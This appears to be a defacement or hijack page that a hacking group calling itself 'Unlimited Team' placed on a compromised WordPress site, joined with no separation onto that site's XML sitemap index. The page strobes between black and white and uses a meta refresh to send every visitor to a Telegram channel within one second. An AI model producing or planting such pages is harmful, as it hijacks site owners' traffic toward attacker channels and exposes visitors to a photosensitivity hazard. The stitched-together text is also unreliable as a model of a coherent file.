<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="1;url=https://t.me/AnubisSecc"/>
    <title>Unlimited Team</title>
    <style>
        body {
            margin: 0;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #000;
            animation: flashBackground 0.4s linear infinite alternate;
            overflow: hidden;
            position: relative;
            user-select: none;
        }

        @keyframes flashBackground {
            0% { background-color: #000; }
            50% { background-color: #111; }
            100% { background-color: #fff; }
        }

        .background-text {
            position: absolute;
            font-size: 8vw;
            color: rgba(255, 255, 255, 0.1);
            font-family: 'Courier New', monospace;
            font-weight: bold;
            text-align: center;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 1;
            text-shadow: 0 0 50px rgba(255, 255, 255, 0.9);
            letter-spacing: -5px;
            white-space: nowrap;
        }

        .container {
            color: #000;
            font-size: 2.5em;
            font-family: 'Courier New', monospace;
            font-weight: bold;
            z-index: 2;
            background: rgba(255, 255, 255, 0.8);
            padding: 10px 20px;
            border-radius: 5px;
            box-shadow: 0 0 20px rgba(0,0,0,0.5);
        }
    </style>
</head>
<body>
    <div class="background-text">Unlimited Team here</div>
    <div class="container">Yönlendiriliyorsunuz...</div>
</body>
</html><?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://blognavigator.quest/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://blognavigator.quest/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://blognavigator.quest/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://blognavigator.quest/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://blognavigator.quest/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
